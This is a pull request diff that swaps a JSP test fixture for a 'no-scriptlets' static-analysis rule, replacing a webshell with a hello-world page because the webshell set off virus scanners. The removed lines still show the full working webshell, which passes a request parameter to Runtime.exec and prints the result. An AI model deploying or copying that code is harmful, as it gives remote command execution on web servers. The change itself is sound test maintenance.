### PR TITLE
Use different scriptlet JSP to test no-scriptlets rule

### DIFF
--- a/java/lang/security/audit/xss/jsp/no-scriptlets.jsp
+++ b/java/lang/security/audit/xss/jsp/no-scriptlets.jsp
@@ -1,27 +1,22 @@
-<!-- cf. https://github.com/JoyChou93/webshell/blob/4a2f049afe009f9cc061357b002cff78c06d6c43/jsp/cmd.jsp -->
+<!-- cf. https://github.com/nirmaldhara/Jsp-hello-world/blob/master/WebContent/index.jsp -->
 <!-- ok: no-scriptlets -->
 <%@ page import="java.util.*,java.io.*"%>
 <!-- ruleid: no-scriptlets -->
 <% %>
-<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
-<INPUT TYPE="text" NAME="comment">
-<INPUT TYPE="submit" VALUE="Send">
-</FORM> <pre>
+<html>
+<body>
+<!-- declaration  -->
+<!-- ruleid: no-scriptlets -->
+<%!String msg="Hello World"; %>
+<!-- 1.	scriptlet  -->
 <!-- ruleid: no-scriptlets -->
 <%
- if ( request.getParameter( "comment" ) != null )
- {
-     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
-     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
-     OutputStream os    = p.getOutputStream();
-     InputStream in        = p.getInputStream();
-     DataInputStream dis    = new DataInputStream( in );
-     String disr        = dis.readLine();
-     while ( disr != null )
-     {
-         out.println( disr ); disr = dis.readLine();
-     }
- }
- %>
- </pre>
- </BODY></HTML>
+out.println("From scriptlet   "+msg);
+%>
+
+<br>
+<!-- expression  -->
+<!-- ruleid: no-scriptlets -->
+<%="From expression   "+msg %>
+</body>
+</html>


### PR DESCRIPTION
Fixes #3673

Change test from webshell to hello world, because
- it tests declarations, scriptlets and expressions,
- it is not a webshell which triggers virus scanners.